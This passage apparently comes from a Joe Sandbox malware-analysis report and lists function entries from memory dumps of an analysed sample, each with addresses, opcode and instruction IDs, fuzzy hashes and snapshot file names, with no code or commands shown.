                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 14ce1f8e74441e6493145ce2788f568d0e5d49b3619122173fb3bc6b0a389dd1
                                                                                                                                                                                                                                                  • Instruction ID: 28f8811f878f0b782d591747e5bc9dcc308375c9255ed8a9a7a17897af662800
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14ce1f8e74441e6493145ce2788f568d0e5d49b3619122173fb3bc6b0a389dd1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 00D012227712360616D077FB2D111FF73CDA9C107578940B2EA5CC2586ED05C85162D0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 066338E8 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950464108.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6630000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: b763563f34e72c91e01b9439146bf6f143571ae552d24d314c1d378a39b202c4
                                                                                                                                                                                                                                                  • Instruction ID: c9eedcac8421b723693dd6852bd3b2c26ade88c409c8085ee881c5c4405ab815
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b763563f34e72c91e01b9439146bf6f143571ae552d24d314c1d378a39b202c4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CAD01231206115CB87142FB4F808469B76AEE85256300407AFD0AD2741DF79DC14D791
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065FB6F0 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 7b2a14441d15d691b855c6a4605df0a770da5fb15632c95a96cbc666b8f96071
                                                                                                                                                                                                                                                  • Instruction ID: 9de4e4460267b81049119f941405867a9f32d24d53cd3ed88260e222f15e2d18
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b2a14441d15d691b855c6a4605df0a770da5fb15632c95a96cbc666b8f96071
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AEE0EC35211704CFC318DF69D048C96B7EAFF8926135184A9E91AC7720DB31EC00CB90
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 066337F2 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950464108.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6630000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: cc9b86cb2b62fc7eff34887c048636a4d03750669c3ab73e0c427414b808dd04
                                                                                                                                                                                                                                                  • Instruction ID: 1f8b02e04c5e84dbb93bf8143e55acb99fb1a067a8fee4d5018baab0ba1b6395
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc9b86cb2b62fc7eff34887c048636a4d03750669c3ab73e0c427414b808dd04
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4DD022306493846FD3420BA0BC14EB73F2EDB82322B0401A6FA16C6292DA184818E2B2
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 06633800 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950464108.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6630000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 192fb7fd145f4589c31b837e986774cdb0fab4eef2b151629adf176c7d6f4848
                                                                                                                                                                                                                                                  • Instruction ID: 731a5895d7a43c94e8a59920212b13b70f6c5362f21d00c26e6f9c08d85118d5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 192fb7fd145f4589c31b837e986774cdb0fab4eef2b151629adf176c7d6f4848
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21C02B3061050C4BDB801FF0FC08766339DCB40213F040024EB0DC1380EE28C400F510
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065F1171 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: cfc93cc0e677a43410c4eed9af337299387915136d301817dfade11be4fbb148
                                                                                                                                                                                                                                                  • Instruction ID: 6ea04333c8a76832e53e7f82628cfc9ab100529bbb40fefb02a6f8dc5981b88b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfc93cc0e677a43410c4eed9af337299387915136d301817dfade11be4fbb148
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95B0122150E784AFEF0B0310AE38AE83F13DBD2311B7240B3D2C2460A7D5220887D635
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%